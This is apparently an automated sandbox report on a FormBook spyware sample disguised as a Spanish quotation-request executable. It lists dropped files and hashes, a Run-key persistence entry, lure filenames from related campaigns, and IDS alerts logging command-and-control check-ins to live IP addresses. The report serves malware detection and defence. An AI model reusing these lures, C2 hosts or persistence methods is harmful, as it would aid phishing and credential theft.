Sample name: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@17/11@17/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 84%
• Number of executed functions: 73
• Number of non-executed functions: 249
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20
• Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
Time | Type | Description
16:02:16 | API Interceptor | 21x Sleep call for process: powershell.exe modified
16:02:22 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
16:03:06 | API Interceptor | 11439378x Sleep call for process: SecEdit.exe modified
22:02:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 26RXLR- C:\Program Files (x86)\Windows Mail\wab.exe
22:02:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 26RXLR- C:\Program Files (x86)\Windows Mail\wab.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                          • 217.70.184.50
                                                          Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Pedido De Compra OC 4504 19082024 De Grupoeld SAS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 217.70.184.50
                                                          www.54bxd.cyouz1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          COTIZACI#U00d3N.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          www.fardvuss.topz1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          COTIZACI#U00d3N.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          GANDI-ASDomainnameregistrar-httpwwwgandinetFROrder#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 217.70.184.38
                                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 217.70.184.50
                                                          CNSV-LLCUShttps://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                          • 192.250.227.23
                                                          https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                          • 192.250.227.23
                                                          http://linkplea.se/doarGet hashmaliciousUnknownBrowse
                                                          • 192.250.229.80
                                                          rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 192.250.234.170
                                                          https://kanomama.com/KFKFLDRFKLEK?///RG9tYWluXFVzZXJuYW1lQGRvbWFpbi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                          • 192.250.229.40
                                                          Novi upit #876567-AWB.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.227.27
                                                          z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.231.28
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.231.28
                                                          SNu4RXZpoS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 192.250.227.28
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.231.28
                                                          HOSTNETNLfirmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                          • 91.184.0.99
                                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          bintoday1.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.111
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.111
                                                          SVK-ASCZz1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          COTIZACI#U00d3N.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          AS-26496-GO-DADDY-COM-LLCUShttps://arcg.is/1PqXT10Get hashmaliciousUnknownBrowse
                                                          • 132.148.76.244
                                                          https://arcg.is/1PqXT10Get hashmaliciousUnknownBrowse
                                                          • 132.148.76.244
                                                          https://canadaca1.godaddysites.comGet hashmaliciousUnknownBrowse
                                                          • 45.40.130.49
                                                          https://canadaca1.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                          • 45.40.130.49
                                                          Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 148.66.136.151
                                                          https://storage.googleapis.com/sd___mailweb/OPPDHETGFTEGDHFHY____PEYDHEYS.htmlGet hashmaliciousPhisherBrowse
                                                          • 107.180.46.160
                                                          rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                          • 198.12.241.35
                                                          4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                          • 198.12.241.35
                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 68.178.246.77
                                                          firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                          • 23.229.187.40
                                                          No context
                                                          No context
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.2477703124252326
                                                          Encrypted:false
                                                          SSDEEP:192:CKDsA5nLHIMdX0oBY6laWBeDlTwT1O65dzuiFYZ24lO8naI:QEncMdkoBYcamO411DzuiFYY4lO8n
                                                          MD5:B429B845BC99D285894A923E8B68E567
                                                          SHA1:9B9413326C822DEDF22E44B644C26D7A4B14BE56
                                                          SHA-256:BEF8BF5DF9613FC5B5D21B99B46E8F97A5A657123D7EE3BD50788940231D4827
                                                          SHA-512:9FA1FC0DC6CB1C3843F28472719A1103186C8776F3DC28002E8FE17F1C9AF03BBB34ED033B7DE94FAD413EAD99E06FBDCABADEB23D77046C44FD68B7BC143420
                                                          Malicious:false
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.5.5.8.5.3.5.5.2.9.8.1.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.5.5.8.5.3.6.8.1.1.0.6.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.9.e.0.9.b.5.-.a.a.a.f.-.4.e.2.1.-.8.6.d.5.-.e.5.0.3.4.1.c.9.a.4.d.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.7.7.d.1.0.3.-.1.7.c.c.-.4.8.f.c.-.a.2.4.2.-.c.5.f.a.4.1.b.d.6.3.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.2.7.P.E.D.I.D.O.S.D.E.C.O.T.I.Z.A.C.I._._.N._._._.s._._.x._._.l._._.x._._._...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.r.k.h.a.n.g.e.l.s.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.8.-.0.0.0.1.-.0.0.1.3.-.3.9.9.0.-.3.9.7.c.8.5.0.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.4.0.7.6.d.6.b.4.c.b.d.7.2.b.2.d.4.6.a.5.9.9.f.3.7.0.2.2.5.6.0.0.0.0.0.0.0.0.!.0.0.0.0.e.8.3.e.0.1.d.c.a.3.b.3.6.8.4.e.4.f.4.
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Mini DuMP crash report, 16 streams, Wed Sep 11 20:02:16 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):510731
                                                          Entropy (8bit):3.398464216671898
                                                          Encrypted:false
                                                          SSDEEP:3072:929AmUZLC3WFNb21CCqgR1S0r40A/iT3+v4Cbe7lilS47P6nu6cSDCP7Y:91E3cIqqTU/y3QsOynHD
                                                          MD5:4A70C262220EBD2384411B25D9383AA8
                                                          SHA1:9C1A3A85DADCA68A8213F083674AAC0AAC9D202C
                                                          SHA-256:94DEFADC856768B832EDF8075EFA3BB1F0A49D269C15A4950F245CF039273508
                                                          SHA-512:95F44D8BF3A5C17D7613F8CF7DB4897B34E479C26C64BA455E5B3AAB6F0876381EDE5A4681E7518D9A6F1E6A706267972A5B2A232DF51F6FDD94F040096FB32D
                                                          Malicious:false
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8966
                                                          Entropy (8bit):3.7266999191483072
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJ5vZzf6YWtqZ1gmfrLXOprx89b4OTfQzom:R6lXJBZL6YcK1gmfrL14afE
                                                          MD5:8171A34C1FF3050F865A075C7AF65811
                                                          SHA1:36E0D1BF6FEAB8B251243C282CE3014F410781C5
                                                          SHA-256:028F064C9F0A01F0D603DEA5B5038D1B211BC5D6542ACCE93553E6F4A2322F35
                                                          SHA-512:A607EED55900D42618B72BB0275528B1167834E216C35E0B832368505A265560B1751D3C086859ECF4676695EDFEFB65FCE4531ED338B7330240ED77A2CFEDD2
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.8.<./.P.i.
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4910
                                                          Entropy (8bit):4.63309527819161
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsFJg771I9q9WpW8VYy0Ym8M4JoDSDmFFmSyq850DvwYUuITmD5+D5Cd:uIjffI7NM7VFJo2pSxnUsV+VCd
                                                          MD5:34F1669DF737A028B577705366526888
                                                          SHA1:4F3E826DBE89DA12BB1EFE8733707ECF71DB2A27
                                                          SHA-256:8A054890234AB329C1E93DFE6AA3A1CD2B8C994EBD1E5713C5B300E510942DF6
                                                          SHA-512:C81EBA780E688B2F8A72CAFC5A19907B4833F04CC3E9CE0D8D6563A98DBEA7408CFEAB9893F8421FFE1FEC300866504872600776BDB1256AEB3BE8361518901A
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="496024" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllultnxj:NllU
                                                          MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                          SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                          SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                          SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                          Malicious:false
                                                          Preview:@...e................................................@..........
                                                          Process:C:\Windows\SysWOW64\SecEdit.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1211596417522893
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                          MD5:0AB67F0950F46216D5590A6A41A267C7
                                                          SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                          SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                          SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                          Malicious:false
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.296069439140736
                                                          Encrypted:false
                                                          SSDEEP:6144:441fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+2omBMZJh1VjE:11/YCW2AoQ0NiEowMHrVA
                                                          MD5:CFB0222D4F2976D364AF5E373B8D1B5A
                                                          SHA1:CCBBEA34FB963F6510075D798E3A2C9CA208E1AE
                                                          SHA-256:FC6F8135883BF82753EC62D39C9CC5F3EE22378CDF7E68F640646CBF156983C7
                                                          SHA-512:F0825794AF99D2EB691D2BA7C89FC67915B71CF68001A1FB87A2B6F11907F628E7799FBACD8B822D776A6048BA8DA780B617A73845C0C9195CC5965FEBECA704
                                                          Malicious:false
                                                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):4.923798534770572
                                                          TrID:
                                                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                          • Win64 Executable GUI (202006/5) 46.43%
                                                          • Win64 Executable (generic) (12005/4) 2.76%
                                                          • Generic Win/DOS Executable (2004/3) 0.46%
                                                          • DOS Executable Generic (2002/1) 0.46%
                                                          File name:z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
                                                          File size:3'079'318 bytes
                                                          MD5:ee557be5d5e16d9ea01241f09a19a87b
                                                          SHA1:e83e01dca3b3684e4f417b85bb4172dc635377e8
                                                          SHA256:e42b2065cd7683b0be8702853b309e09474f23ff67851cb8295686194006622a
                                                          SHA512:1ec2e18ae64ad994b279c4778c85d17df40d8de889d04c312a24b5bdf70fe1696f926016cc10e891e0fc2b0811d8f89b86d593ed6ff7a96b2c83d489bc3e1ce9
                                                          SSDEEP:12288:sR2wFm7mveI0f0bA1n4ADwC8ZjE8E27hs4k2BX48gUaZczMAjiCrj:s9m7my0bA2ADw7E8H73I8gU0czL7j
                                                          TLSH:21E5AF91B9474C97FC1212B1C8EAB9F010FD5D5B74F0520FEF657E2266B227E10A683A
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....x.f.........."...0..=............... ....@...... ..............................+./...`................................
                                                          Icon Hash:1c188bc89a2c567b
                                                          Entrypoint:0x400000
                                                          Entrypoint Section:
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66DF7809 [Mon Sep 9 22:34:49 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:
                                                          Instruction
                                                          dec ebp
                                                          pop edx
                                                          nop
                                                          add byte ptr [ebx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax+eax], al
                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x41ac2 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x3d92 | 0x3e00 | 3214833196d7a24a0e9efe3b119b78d6 | False | 0.6476814516129032 | data | 6.227977271663902 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x41ac2 | 0x41c00 | fbc8b93323051f53ce0463e532967bf4 | False | 0.16046072956273763 | data | 4.2616249064478655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6144 | 0x41428 | Device independent bitmap graphic, 253 x 512 x 32, image size 259072, resolution 3779 x 3779 px/m | | | 0.15837772723191573
RT_GROUP_ICON | 0x4756c | 0x14 | data | | | 1.2
RT_VERSION | 0x47580 | 0x358 | data | | | 0.4135514018691589
RT_MANIFEST | 0x478d8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-11T22:02:49.640040+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49707 | 217.70.184.50 | 80 | TCP
2024-09-11T22:03:05.636449+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49709 | 199.192.19.19 | 80 | TCP
2024-09-11T22:03:08.481012+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49710 | 199.192.19.19 | 80 | TCP
2024-09-11T22:03:10.994616+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49711 | 199.192.19.19 | 80 | TCP
2024-09-11T22:03:13.538921+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49712 | 199.192.19.19 | 80 | TCP
2024-09-11T22:03:19.922113+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49713 | 91.184.0.111 | 80 | TCP
2024-09-11T22:03:22.474600+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49714 | 91.184.0.111 | 80 | TCP
2024-09-11T22:03:25.415863+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49715 | 91.184.0.111 | 80 | TCP
2024-09-11T22:03:27.843432+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49716 | 91.184.0.111 | 80 | TCP
